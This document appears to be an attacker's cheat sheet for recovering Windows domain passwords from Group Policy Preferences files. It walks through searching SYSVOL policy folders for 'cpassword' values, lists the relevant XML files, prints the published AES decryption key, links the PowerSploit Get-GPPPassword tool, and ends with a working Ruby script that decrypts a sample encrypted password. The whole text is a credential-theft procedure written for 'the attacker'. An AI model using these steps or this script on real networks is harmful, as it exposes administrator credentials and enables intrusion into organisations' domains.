-
To reach SYSVOL folder: run> %Logonserver%
-
\\SYSVOL<DOMAIN>\Policies\
-
Search for XML, VBS or Batch file that is used to change the password. This can be done by searching for the mentioned file types (with specific search keywords). The password reset script is to be found.
-
*.xml , *.vbs , *.bat etc.
-
Map drives (Drives.xml)
-
Create Local Users (unattend.xml)
-
Data Sources (DataSources.xml)
-
Printer configuration (Printers.xml)
-
Create/Update Services (Services.xml)
-
Scheduled Tasks (ScheduledTasks.xml)
-
Change local Administrator passwords
-
Group policy preferences (Groups.xml)
These XML files can be searched in the SYSVOL folder using key word search. Passwords in the XML file can be searched using the key value “cpassword”. The encryption is 32-byte AES as per Microsoft’s documentation, the encryption key is:
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
AES KEY Source: https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx
With access to this XML file, the attacker can use the AES private key to decrypt the GPP password. The PowerSploit function Get-GPPPassword is most useful for Group Policy Preference exploitation.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
require 'rubygems'
require 'openssl'
require 'base64'
encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
def decrypt(encrypted_data)
padding = "=" * (4 - (encrypted_data.length % 4))
epassword = "#{encrypted_data}#{padding}"
decoded = Base64.decode64(epassword)
key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
aes.decrypt
aes.key = key
plaintext = aes.update(decoded)
plaintext << aes.final
pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion
return pass
end
blah = decrypt(encrypted_data)
puts blah